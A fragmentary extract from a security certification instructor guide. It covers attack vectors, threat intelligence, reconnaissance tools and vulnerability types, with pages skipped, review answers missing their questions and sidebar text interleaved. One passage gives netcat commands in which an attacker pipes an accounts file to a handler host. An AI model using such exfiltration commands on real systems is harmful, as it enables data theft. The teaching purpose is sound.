engineering techniques to persuade or trick the user into opening the attachment.
• Remote and wireless—the attacker either obtains credentials for a remote access
or wireless connection to the network or cracks the security protocols used for
authentication. Alternatively, the attacker spoofs a trusted resource, such as an
access point, and uses it to perform credential harvesting and then uses the stolen
account details to access the network.
• Supply chain—rather than attack the target directly, a threat actor may seek
ways to infiltrate it via companies in its supply chain. One high-profile example of
this is the Target data breach, which was made via the company's HVAC supplier
(krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company).
• Cloud—many companies now run part or all of their network services via Internet-
accessible clouds. The attacker only needs to find one account, service, or host with
weak credentials to gain access. The attacker is likely to target the accounts used to
develop services in the cloud or manage cloud systems. They may also try to attack
the cloud service provider (CSP) as a way of accessing the victim system.
Sophisticated threat actors will make use of multiple vectors. They are likely to plan a
multi-stage campaign, rather than a single "smash and grab" type of raid.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
24 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Threat Actor Types and Attack Vectors
Answer the following questions:
Risk. To assess likelihood and impact, you must identify both the vulnerability and the
threat posed by a potential exploit.
2. True or false? Nation state actors primarily only pose a risk to other states.
False—nation state actors have targeted commercial interests for theft, espionage, and
extortion.
This is either gray hat (semi-authorized) hacking or black hat (non-authorized) hacking.
If the request for compensation via consultancy is an extortion threat (if refused, the
hacker sells the exploit on the dark web), then the motivation is purely financial gain
and can be categorized as black hat. If the consultancy is refused and the hacker takes
no further action, it can be classed as gray hat.
Hacktivist.
5. Which three types of threat actor are most likely to have high levels
of funding?
6. You are assisting with writing an attack surface assessment report for a
small company. Following the CompTIA syllabus, which two potential attack
vectors have been omitted from the following headings in the report? Direct
access, Email, Remote and wireless, Web and social media, Cloud.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 25
Topic 2B
Explain Threat Intelligence Sources
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
26 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Using the TOR browser to view the AlphaBay market, now closed by law enforcement.
(Screenshot used with permission from Security Onion.)
Investigating these dark web sites and message boards is a valuable source of
counterintelligence. The anonymity of dark web services has made it easy for
investigators to infiltrate the forums and webstores that have been set up to exchange
stolen data and hacking tools. As adversaries react to this, they are setting up new
networks and ways of identifying law enforcement infiltration. Consequently, dark nets
and the dark web represent a continually shifting landscape.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 27
subscribers in the form of blogs, white papers, and webinars. Some examples of
such platforms include:
• FireEye (fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-
subscriptions.html)
IBM X-Force Exchange threat intelligence portal. (Image copyright 2019 IBM Security
exchange.xforce.ibmcloud.com.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
28 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Spamhaus (spamhaus.org/organization)
• VirusTotal (virustotal.com)
As well as referring to open-source threat research providers, OSINT can mean any
intelligence derived from publicly available information. OSINT is a common reconnaissance
technique where the attacker harvests domains, IP address ranges, employees, and other
data that will assist in identifying attack vectors. Companies should also monitor public
networks for signs of attack planning (chatter on forums) and breaches (confidential
information or account credentials posted to online forums). Most commercial providers
offer monitoring services, which can include dark web sources (fireeye.com/content/dam/
fireeye-www/products/pdfs/pf/intel/ds-digital-threat-monitoring.pdf).
As well as a source of information, social media should also be monitored for threat data
(trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hunting-threats-on-
twitter).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 29
TTPs describe what and how an adversary acts and Indicators describe how to recognize
what those actions might look like. (stixproject.github.io/documentation/concepts/
ttp-vs-indicator)
As there are many different targets and vectors of an attack, so too are there many
different potential IoCs. The following is a list of some IoCs that you may encounter:
• Unauthorized software and files
• Suspicious emails
• Rogue hardware
An IoC can be definite and objectively identifiable, like a malware signature, but often
IoCs can only be described with confidence via the correlation of many data points. Show Slide(s)
Because these IoCs are often identified through patterns of anomalous activity rather
than single events, they can be open to interpretation and therefore slow to diagnose.
Threat Data Feeds
Consequently, threat intelligence platforms use AI-backed analysis to speed up
detection without overwhelming analysts' time with false positives.
Teaching
Tip
Strictly speaking, an IoC is evidence of an attack that was successful. The term indicator of
Make sure students
attack (IoA) is sometimes also used for evidence of an intrusion attempt in progress.
can distinguish STIX
and TAXII.
Note that we'll
cover vulnerability
Threat Data Feeds assessment in the
next lesson.
When you use a cyber threat intelligence (CTI) platform, you subscribe to a threat data
Interaction
feed. The information in the threat data can be combined with event data from your
Opportunity
own network and system logs. An analysis platform performs correlation to detect
whether any IoCs are present. There are various ways that a threat data feed can be You can show some
other threat map
implemented.
examples, such
as CheckPoint's
Structured Threat Information eXpression (STIX) (threatmap.
checkpoint.com).
The OASIS CTI framework (oasis-open.github.io/cti-documentation) is designed to Kaspersky's is visually
provide a format for this type of automated feed so that organizations can share CTI. impressive too
The Structured Threat Information eXpression (STIX) part of the framework describes (cybermap.kaspersky.
standard terminology for IoCs and ways of indicating relationships between them. com).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
30 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
STIX 2 Relationship example. (Icon images © Copyright 2016 Bret Jordan. Licensed under the Creative
Commons Attribution-ShareAlike (CC BY-SA) License, Version 4.0. (freetaxii.github.io/stix2-icons.html.)
Where STIX provides the syntax for describing CTI, the Trusted Automated eXchange
of Indicator Information (TAXII) protocol provides a means for transmitting CTI data
between servers and clients. For example, a CTI service provider would maintain a
repository of CTI data. Subscribers to the service obtain updates to the data to load
into analysis tools over TAXII. This data can be requested by the client (referred to as a
collection), or the data can be pushed to subscribers (referred to as a channel).
Threat Maps
A threat map is an animated graphic showing the source, target, and type of attacks
that have been detected by a CTI platform. The security solutions providers publish
such maps showing global attacks on their customers' systems (fortinet.com/
fortiguard/threat-intelligence/threat-map).
File/Code Repositories
A file/code repository such as virustotal.com holds signatures of known malware code.
The code samples derive from live customer systems and (for public repositories) files
that have been uploaded by subscribers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 31
A threat data feed does not produce threat intelligence automatically. The combination Artificial Intelligence
of security intelligence and CTI data can be processed, correlated, and analyzed to and Predictive Analysis
provide actionable insights that will assist you in identifying security problems. For
example, security intelligence reveals that DDoS attacks were perpetrated against your Teaching
web services from a range of IP addresses by collecting log and network traffic data. Tip
Threat intelligence associates those IP addresses with a hacktivist group. By linking Note that security
the two sources of intelligence, you can identify goals and tactics associated with that tools are increasingly
group and use controls to mitigate further attacks. Most threat intelligence platforms making use of AI and
use some sort of artificial intelligence (AI) to perform correlation analysis. ML techniques. We will
be referring to these
again when looking
AI and Machine Learning at SIEM and SOAR
analytics and incident
AI is the science of creating machine systems that can simulate or demonstrate a response.
similar general intelligence capability to humans. Early types of AI—expert systems—
use if-then rules to draw inferences from a limited data set, called a knowledge base.
Machine learning (ML) uses algorithms to parse input data and then develop
strategies for using that data, such as identifying an object as a type, working out the
best next move in a game, and so on. Unlike an expert system, machine learning can
modify the algorithms it uses to parse data and develop strategies. It can make gradual
improvements in the decision-making processes. The structure that facilitate this
learning process is referred to as an artificial neural network (ANN). Nodes in a neural
network take inputs and then derive outputs, using complex feedback loops between
nodes. An ML system has objectives and error states and it adjusts its neural network
to reduce errors and optimize objectives.
In terms of threat intelligence, this AI-backed analysis might perform accurate
correlations that would take tens or hundreds of hours of analyst time if the data were
to be examined manually.
Predictive Analysis
Identifying the signs of a past attack or the presence of live attack tools on a network
quickly is valuable. However, one of the goals of using AI-backed threat intelligence is
to perform predictive analysis, or threat forecasting. This means that the system can
anticipate a particular type of attack and possibly the identity of the threat actor before
the attack is fully realized. For example, the system tags references to a company,
related IP addresses, and account names across a range of ingested data from dark
web sources, web searches, social media posts, phishing email attempts, and so on.
The analysis engine associates this "chatter" with IP addresses that it can correlate with
a known adversary group. This gives the target advance warning that an attack is in the
planning stages and more time to prepare an effective defense.
Such concrete threat forecasting is not a proven capability of any commercial threat
intelligence platform at the time of writing. However, predictive analysis can inform risk
assessment by giving more accurate, quantified measurements of the likelihood and
impact (cost) of breach-type events.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
32 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Threat Intelligence Sources
Answer the following questions:
For critical infrastructure providers, threat data sharing via an Information Sharing and
Analysis Center (ISAC) is likely to be the best option.
3. You are assessing whether to join AIS. What is AIS and what protocol should
your SIEM support in order to connect to AIS servers?
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 33
Lesson 2
Summary
You should be able to explain how to assess external and insider threat actor types Teaching
in terms of intent and capability. You should also be able to summarize options for Tip
implementing threat intelligence platforms and data sources. Check that students
are confident about
the content that has
Guidelines for Explaining Threat Actors and been covered. If there
Threat Intelligence is time, re-visit any
content examples that
Follow these guidelines when you assess the use of threat research and analysis: they have questions
about. If you have
• Create a profile of threat actor types that pose the most likely threats to your used all the available
business. Remember that you may be targeted as the supplier to a larger enterprise. time for this lesson
block, note the issues,
• Identify sources of threat research, especially those that are directly relevant to your and schedule time for
industry sector. Schedule time to keep up-to-date with threat trends and security a review later in the
course.
best practices.
Interaction
• Evaluate the use of a threat intelligence platform, considering proprietary versus
Opportunity
open-source options.
Optionally, discuss
• Evaluate the use of different proprietary and open-source threat data feeds, with students how
considering that sector-specific data might be of most use. threat intelligence
platforms and data
feeds could be used
within their own
workplaces, or how
these resources
have already been
implemented, and
how successful they
have proved.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 3
Performing Security Assessments
Lesson Objectives
In this lesson, you will:
• Assess organizational security with network reconnaissance tools.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
36 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 3A
Assess Organizational Security with
Network Reconnaissance Tools
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 37
Performing a ping sweep in Windows with a For loop—Searching multiple octets requires nested loops.
Note that not all hosts respond to ICMP probes. (Screenshot used with permission from Microsoft.)
For more information about commands, including syntax usage, look up the command in
an online resource for Windows (docs.microsoft.com/en-us/windows-server/administration/
windows-commands/windows-commands) or Linux (linux.die.net/man).
The following tools can be used to test the routing configuration and connectivity with route and traceroute
remote hosts and networks.
• route—view and configure the host's local routing table. Most end systems use a
default route to forward all traffic for remote networks via a gateway router. If the
host is not a router, additional entries in the routing table could be suspicious.
Output from the route command on a Linux host. Most endpoints have a simple routing table, similar
to this. It shows the default route (0.0.0.0/0) via the host configured as the default gateway (10.1.0.254)
over the network interface eth0. The second line of the table shows the subnet for local traffic
(10.1.0.0/24). This network is directly connected, represented by the 0.0.0.0 gateway.
• tracert—uses ICMP probes to report the round trip time (RTT) for hops between the
local host and a host on a remote network. tracert is the Windows version of
the tool.
• pathping—provides statistics for latency and packet loss along a route over a
longer measuring period. pathping is a Windows tool; the equivalent on Linux
is mtr.
In a security context, high latency at the default gateway compared to a baseline might
indicate a man-in-the-middle attack. High latency on other hops could be a sign of
denial or service, or could just indicate network congestion.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
38 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In Linux, commands such as ifconfig, arp, route, and traceroute are deprecated and
the utilities have not been updated for some years. The iproute2 suite of tools supply
replacements for these commands (digitalocean.com/community/tutorials/how-to-use-
iproute2-tools-to-manage-network-configuration-on-a-linux-vps).
Nmap default scan listing open ports from within the default range. (Screenshot Nmap nmap.org.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 39
Having identified active IP hosts on the network and gained an idea of the network Service Discovery and
topology, the next step in network reconnaissance is to work out which operating Nmap
systems are in use, which network services each host is running, and, if possible,
which application software is underpinning those services. This process is described as Teaching
service discovery. Service discovery can also be used defensively, to probe potential Tip
rogue systems and identify the presence of unauthorized network service ports. Remind students that
these techniques
Service Discovery with Nmap can be used
defensively (auditing)
When Nmap completes a host discovery scan, it will report on the state of each port or offensively
scanned for each IP address in the scope. At this point, you can run additional service (reconnaissance).
discovery scans against one or more of the active IP addresses. Some of the principal
options for service discovery scans are:
• TCP SYN (-sS)—this is a fast technique also referred to as half-open scanning, as
the scanning host requests a connection without acknowledging it. The target's
response to the scan's SYN packet identifies the port state.
• UDP scans (-sU)—scan UDP ports. As these do not use ACKs, Nmap needs to wait
for a response or timeout to determine the port state, so UDP scanning can take a
long time. A UDP scan can be combined with a TCP scan.
• Port range (-p)—by default, Nmap scans 1000 commonly used ports, as listed in its
configuration file. Use the -p argument to specify a port range.
• Application name and version—the software operating the port, such as Apache
web server or Internet Information Services (IIS) web server.
• Device type—not all network devices are PCs. Nmap can identify switches and
routers or other types of networked devices, such as NAS boxes, printers, and
webcams.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
40 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
netstat command running on Windows showing activity during an nmap scan. The findstr function
is being used to filter the output (to show only connections from IPv4 hosts on the same subnet).
(Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 41
On Linux, use of netstat is deprecated in favor of the ss command from the iptools2 suite
(linux.com/topic/networking/introduction-ss-command).
Testing whether the name server for comptia.org will allow a zone transfer.
(Screenshot used with permission from Microsoft.)
There are hundreds of tools relevant to security assessments, network reconnaissance, Other Reconnaissance
vulnerability scanning, and penetration testing. Security distributions specialize in and Discovery Tools
bundling these tools for Linux—notably KALI (kali.org) plus ParrotOS (parrotlinux.org)—
and Windows (fireeye.com/blog/threat-research/2019/03/commando-vm-windows- Teaching
offensive-distribution.html). Tip
There is only space
theHarvester for brief overviews of
these tools, though
theHarvester is a tool for gathering open-source intelligence (OSINT) for a particular we will be examining
domain or company name (github.com/laramies/theHarvester). It works by scanning vulnerability scanners
multiple public data sources to gather emails, names, subdomains, IPs, URLs and other in more detail later in
the lesson.
relevant data.
dnsenum
While you can use tools such as dig and whois to query name records and hosting
details and to check that external DNS services are not leaking too much information,
a tool such as dnsenum packages a number of tests into a single query (github.com/
fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can
try to work out the IP address ranges that are in use.
scanless
Port scanning is difficult to conceal from detection systems, unless it is performed
slowly and results gathered over an extended period. Another option is to disguise the
source of probes. To that end, scanless is a tool that uses third-party sites (github.com/
vesche/scanless). This sort of tool is also useful for in a defensive sense by scanning for
ports and services that are open, but shouldn't be.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
42 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
curl
curl is a command-line client for performing data transfers over many types of
protocol (curl.haxx.se). This tool can be used to submit HTTP GET, POST, and PUT
requests as part of web application vulnerability testing. curl supports many other
data transfer protocols, including FTP, IMAP, LDAP, POP3, SMB, and SMTP.
Nessus
The list of services and version information that a host is running can be cross-
checked against lists of known software vulnerabilities. This type of scanning is
usually performed using automated tools. Nessus, produced by Tenable Network
Security (tenable.com/products/nessus/nessus-professional), is one of the best-known
commercial vulnerability scanners. It is available in on-premises (Nessus Manager)
and cloud (Tenable Cloud) versions, as well as a Nessus Professional version, designed
for smaller networks. The product is free to use for home users but paid for on a
subscription basis for enterprises. As a previously open-source program, Nessus also
supplies the source code for many other scanners.
Teaching
• Packet analysis refers to deep-down frame-by-frame scrutiny of captured frames.
Tip • Protocol analysis means using statistical tools to analyze a sequence of packets, or
Make sure students packet trace.
understand what
information can be Packet and protocol analysis depends on a sniffer tool to capture and decode the
gathered depending frames of data. Network traffic can be captured from a host or from a network
on where the host/
sensor running the
segment. Using a host means that only traffic directed at that host is captured.
tool is placed in the Capturing from a network segment can be performed by a switched port analyzer
network. (SPAN) port (or mirror port). This means that a network switch is configured to copy
Note that network frames passing over designated source ports to a destination port, which the packet
monitoring is both a sniffer is connected to. Sniffing can also be performed over a network cable segment
threat (snooping) and by using a test access port (TAP). This means that a device is inserted in the cabling to
a security measure copy frames passing over it. There are passive and active (powered) versions.
(snooping on the
snoopers). Typically, sniffers are placed inside a firewall or close to a server of particular
importance. The idea is usually to identify malicious traffic that has managed to
get past the firewall. A single sniffer can generate an exceptionally large amount of
data, so you cannot just put multiple sensors everywhere in the network without
provisioning the resources to manage them properly. Depending on network size and
resources, one or just a few sensors will be deployed to monitor key assets or network
paths.
tcpdump is a command-line packet capture utility for Linux (linux.die.net/man/8/
tcpdump). The basic syntax of the command is tcpdump -i eth0, where
eth0 is the interface to listen on. The utility will then display captured packets until
halted manually (Ctrl+C). Frames can be saved to a .pcap file using the -w option.
Alternatively, you can open a pcap file using the -r option.
tcpdump is often used with some sort of filter expression to reduce the number of
frames that are captured:
• Type—filter by host, net, port, or portrange.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 43
• Protocol—filter by a named protocol rather than port number (for example, arp,
icmp, ip, ip6, tcp, udp, and so on).
Filter expressions can be combined by using Boolean operators:
• and (&&)
• or (||)
• not (!)
Filter syntax can be made even more detailed by using parentheses to group
expressions. A complex filter expression should be enclosed by quotes. For example,
the following command filters frames to those with the source IP 10.1.0.100 and
destination port 53 or 80:
tcpdump -i eth0 "src host 10.1.0.100 and (dst port
53 or dst port 80)"
A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to perform Packet Analysis and
traffic analysis. You can either analyze a live capture or open a saved capture (.pcap) Wireshark
file. Protocol analyzers can decode a captured frame to reveal its contents in a readable
format. You can choose to view a summary of the frame or choose a more detailed Teaching
view that provides information on the OSI layer, protocol, function, and data. Tip
Students should get as
Wireshark (wireshark.org) is an open-source graphical packet capture and analysis much practice using
utility, with installer packages for most operating systems. Having chosen the interface Wireshark as possible.
to listen on, the output is displayed in a three-pane view. The packet list pane shows a
scrolling summary of frames. The packet details pane shows expandable fields in the
frame currently selected from the packet list. The packet bytes pane shows the raw
data from the frame in hex and ASCII. Wireshark is capable of parsing (interpreting) the
headers and payloads of hundreds of network protocols.
You can apply a capture filter using the same expression syntax as tcpdump (though
the expression can be built via the GUI tools too). You can save the output to a .pcap
file or load a file for analysis. Wireshark supports very powerful display filters (wiki.
wireshark.org/DisplayFilters) that can be applied to a live capture or to a capture file.
You can also adjust the coloring rules (wiki.wireshark.org/ColoringRules), which control
the row shading and font color for each frame.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
44 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Another useful option is to use the Follow TCP Stream context command to
reconstruct the packet contents for a TCP session.
The PCAP file format has some limitations, which has led to the development of PCAP Next
Generation (PCAPNG). Wireshark now uses PCAPNG by default, and tcpdump can process
files in the new format too (cloudshark.io/articles/5-reasons-to-move-to-pcapng).
hping
hping is an open-source spoofing tool that provides a penetration tester with the
ability to craft network packets to exploit vulnerable firewalls and IDSs. hping can
perform the following types of test:
• Host/port detection and firewall testing—like Nmap, hping can be used to probe
IP addresses and TCP/UDP ports for responses.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 45
tcpreplay
As the name suggests, tcpreplay takes previously captured traffic that has been saved
to a .pcap file and replays it though a network interface (linux.die.net/man/1/tcpreplay).
Optionally, fields in the capture can be changed, such as substituting MAC or IP
addresses. tcpreplay is useful for analysis purposes. If you have captured suspect
traffic, you can replay it through a monitored network interface to test intrusion
detection rules.
A remote access trojan (RAT) is malware that gives an adversary the means of Exploitation
remotely accessing the network. From the perspective of security posture assessment, Frameworks
a penetration tester might want to try to establish this sort of connection and attempt
to send corporate information over the channel (data exfiltration). If security controls Teaching
are working properly, this attempt should be defeated (or at least detected). Tip
An exploitation framework uses the vulnerabilities identified by an automated These are complex
products, so just focus
scanner and launches scripts or software to attempt to deliver matching exploits. This on the basic uses.
might involve considerable disruption to the target, including service failure, and risk
data security.
The framework comprises a database of exploit code, each targeting a particular
CVE (Common Vulnerabilities and Exposures). The exploit code can be coupled with
modular payloads. Depending on the access obtained via the exploit, the payload code
may be used to open a command shell, create a user, install software, and so on. The
custom exploit module can then be injected into the target system. The framework
may also be able to obfuscate the code so that it can be injected past an intrusion
detection system or anti-virus software.
The best-known exploit framework is Metasploit (metasploit.com). The platform
is open-source software, now maintained by Rapid7. There is a free framework
(command-line) community edition with installation packages for Linux and Windows.
Rapid7 produces pro and express commercial editions of the framework and it can be
closely integrated with the Nexpose vulnerability scanner.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
46 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Zed Attack Proxy (ZAP)—scanning tools and scripts for web application and mobile
app security testing (owasp.org/www-project-zap).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 47
The following command connects to the listener and grants access to the terminal:
nc 10.1.0.1 666
Used the other way around, Netcat can be used to receive files. For example, on the
target system the attacker runs the following:
type accounts.sql | nc 10.1.0.192 6666
On the handler (IP 10.1.0.192), the attacker receives the file using the following
command:
nc -l -p 6666 > accounts.sql
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
48 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Organizational Security with Network
Reconnaissance Tools
Answer the following questions:
1. You suspect that a rogue host is acting as the default gateway for a subnet
in a spoofing attack. What command-line tool(s) can you use from a
Windows client PC in the same subnet to check the interface properties of
the default gateway?
Use ipconfig to check the IP addresses of the default gateway and the DHCP server. Use
arp to check the MAC addresses associated with those IP addresses and investigate
possible spoofing. You could also use the route command to verify the properties of
the default route.
2. You suspect the rogue host is modifying traffic before forwarding it, with
the side effect of increasing network latency. Which tool could you use to
measure latency on traffic routed from this subnet?
From a Windows host, the pathping tool can be used to measure latency along a route.
3. What type of tool could you use to fingerprint the host acting as the default
gateway?
4. You are investigating a Linux server that is the source of suspicious network
traffic. At a terminal on the server, which tool could you use to check which
process is using a given TCP port?
5. What is a zone transfer and which reconnaissance tools can be used to test
whether a server will allow one?
A zone transfer is where a domain name server (DNS) allows a client to request all the
name records for a domain. nslookup (Windows) and dig (principally Linux) can be used
to test whether this query is allowed. You could also mention the dnsenum tool, which
will check for zone transfers along with other enumeration tests on DNS infrastructure.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 49
7. You are developing new detection rules for a network security scanner.
Which tool will be of use in testing whether the rules match a malicious
traffic sample successfully?
The tcpreplay tool can be used to stream captured traffic from a file to a monitored
network interface.
8. What security posture assessment could a pen tester make using Netcat?
Whether it is possible to open a network connection to a remote host over a given port.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
50 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 3B
Explain Security Concerns with General
Vulnerability Types
• Firmware—vulnerabilities can exist in the BIOS/UEFI firmware that controls the boot
process for PCs. There can also be bugs in device firmware, such as network cards
and disk controllers. Finally, network appliances and Internet of Things (IoT) devices
run OS code as a type of firmware. Like kernel vulnerabilities, firmware exploits
can be difficult to identify, because the exploit code can run with the highest
level of privilege. The Intel AMT vulnerability illustrates the impacts of a firmware
vulnerability (blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-
Stealth-Breakthrough-wp.pdf).
Most vulnerabilities are discovered by software and security researchers, who notify
the vendor to give them time to patch the vulnerability before releasing details
to the wider public. Improper or weak patch management is an additional layer
of vulnerability where these security patches are not applied to systems, leaving
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 51
them vulnerable to exploits. Poor configuration management may mean that the
organization is simply not documenting and managing its assets rigorously. Patches
may be deployed to some systems, but not others. Patches may be applied and then
removed because they cause performance issues.
Even if effective patch management procedures are in place, attackers may still be Zero-Day and
able to use software vulnerabilities as an attack vector. A vulnerability that is exploited Legacy Platform
before the developer knows about it or can release a patch is called a zero-day. These Vulnerabilities
can be extremely destructive, as it can take the vendor some time to develop a patch,
leaving systems vulnerable in the interim.
The term zero-day is usually applied to the vulnerability itself but can also refer to an attack
or malware that exploits it. The EternalBlue zero-day exploit makes for an instructive case
study (wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world).
Zero-day vulnerabilities have significant financial value. A zero-day exploit for a mobile
OS can be worth millions of dollars. Consequently, an adversary will only use a zero-
day vulnerability for high value attacks. State security and law enforcement agencies
are known to stockpile zero-days to facilitate the investigation of crimes.
A legacy platform is one that is no longer supported with security patches by its
developer or vendor. This could be a PC/laptop/smartphone, networking appliance,
peripheral device, Internet of Things device, operating system, database/programming
environment, or software application. By definition, legacy platforms are unpatchable.
Such systems are highly likely to be vulnerable to exploits and must be protected
by security controls other than patching, such as isolating them to networks that an
attacker cannot physically connect to.
While ineffective patch and configuration management policies and procedures Weak Host
represent one type of vulnerability, weak configurations can have similar impacts. Configurations
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
52 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
account is usually disabled for login. Even if this type of account is enabled for local
(interactive) login, it should not be accessible via remote login mechanisms.
Open Permissions
Open permissions refers to provisioning data files or applications without
differentiating access rights for user groups. Permissions systems can be complex
and it is easy to make mistakes, such as permitting unauthenticated guests to view
confidential data files, or allowing write access when only read access is appropriate.
This issue is particularly prevalent on cloud storage, where administrators used to
Windows and Linux directory access control lists may be unfamiliar with the cloud
equivalents (directdefense.com/how-to-prevent-exploitation-of-amazon-s3-buckets-
with-weak-permissions).
• Disable services that are installed by default but that are not needed. Ideally, disable
the service on the server itself, but in some circumstances it may be necessary to
block the port using a firewall instead.
• For services that should only be available on the private network, block access to
ports at border firewalls or segment the network so that the servers cannot be
accessed from external networks.
Unsecure Protocols
An unsecure protocol is one that transfers data as cleartext; that is, the protocol does
not use encryption for data protection. Lack of encryption also means that there is
no secure way to authenticate the endpoints. This allows an attacker to intercept and
modify communications, acting as man-in-the-middle (MITM).
Weak Encryption
Encryption algorithms protect data when it is stored on disk or transferred over
a network. Encrypted data should only be accessible to someone with the correct
decryption key. Weak encryption vulnerabilities allow unauthorized access to data.
Such vulnerabilities arise in the following circumstances:
• The key is generated from a simple password, making it vulnerable to guessing
attempts by brute-force enumeration (if the password is too short) or dictionary
enumeration (if the password is not complex).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 53
• The algorithm or cipher used for encryption has known weaknesses that allow
brute-force enumeration.
• The key is not distributed securely and can easily fall into the hands of people who
are not authorized to decrypt the data.
Errors
Weakly configured applications may display unformatted error messages under
certain conditions. These error messages can be revealing to threat actors probing for
vulnerabilities and coding mistakes. Secure coding practices should ensure that if an
application fails, it does so "gracefully" without revealing information that could assist
the development of an exploit.
Vulnerabilities can lead to various data breach and data loss scenarios. These Impacts from
events can have serious impacts in terms of costs and damage to the organization's Vulnerabilities
reputation.
Teaching
Data Breaches and Data Exfiltration Impacts Tip
Ensure students can
All information should be collected, stored, and processed by authenticated users and distinguish breach,
hosts subject to the permissions (authorization) allocated to them by the data owner. exfiltration, and loss
Data breach and data exfiltration describe two types of event where unauthorized and associate these
information use occurs: events with financial
and reputational
• A data breach event is where confidential data is read or transferred without impacts.
authorization. A privacy breach is where personal data is not collected, stored,
or processed in full compliance with the laws or regulations governing personal
information. A breach can also be described as a data leak. A data breach can be
intentional/malicious or unintentional/accidental.
• Data exfiltration is the methods and tools by which an attacker transfers data
without authorization from the victim's systems to an external network or media.
Unlike a data breach, a data exfiltration event is always intentional and malicious. A
data breach is a consequence of a data exfiltration event.
Data breach includes a wide range of scenarios with different levels of impact. The
most severe data breaches compromise valuable intellectual property (IP) or the
personal information of account holders.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
54 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 55
Data Storage
There are two main scenarios for risks to data when using third-parties. First, you may
need to grant vendor access to your data, and second, you may use a vendor to host
data or data backups and archives. The following general precautions should be taken:
• Ensure the same protections for data as though it were stored on-premises,
including authorization and access management and encryption.
• Monitor and audit third-party access to data storage to ensure it is being used only
in compliance with data sharing agreements and non-disclosure agreements.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
56 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
